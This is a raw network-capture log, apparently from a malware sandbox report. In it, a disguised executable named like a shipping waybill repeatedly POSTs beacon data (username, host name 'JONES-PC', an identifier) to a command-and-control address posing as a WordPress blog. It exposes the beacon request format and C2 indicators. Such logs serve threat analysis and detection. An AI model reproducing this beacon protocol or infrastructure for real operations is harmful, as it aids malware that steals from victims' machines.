Apr 25, 2024 09:42:51.051470041 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:51.893538952 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:50 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:51.893675089 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:51.893755913 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:51.901823044 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:51.902108908 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:51.902261019 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:51.902535915 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:51.902663946 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:51.902707100 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:51.902807951 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49792	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:52.171896935 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:52.299145937 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:53.244693041 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:52 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:53.244715929 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:53.244733095 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:53.251873016 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:53.252248049 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:53.252516031 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:53.252655029 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:53.252681017 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:53.252847910 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:53.252892017 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49793	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:53.510184050 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:53.637377024 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:54.453133106 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:53 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:54.453160048 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:54.461505890 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:54.461931944 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:54.462101936 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:54.462296009 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:54.462393999 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:54.462497950 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:54.462551117 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:42:54.462606907 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49794	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:54.719782114 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:54.845704079 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:55.652230024 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:54 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:55.652302980 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:55.652367115 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:55.661103010 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:55.661510944 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:55.661721945 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:55.662125111 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:55.662143946 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:55.662159920 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:55.662178040 CEST	670	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49795	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:55.953897953 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:56.079916954 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:56.925452948 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:56 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:56.925470114 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 25, 2024 09:42:56.925493956 CEST	12	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 Data Ascii: lang="en-US"
Apr 25, 2024 09:42:56.925635099 CEST	25	IN	Data Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: ><head><meta charset="
Apr 25, 2024 09:42:56.925757885 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:56.945918083 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:56.946613073 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:56.946772099 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:56.946878910 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
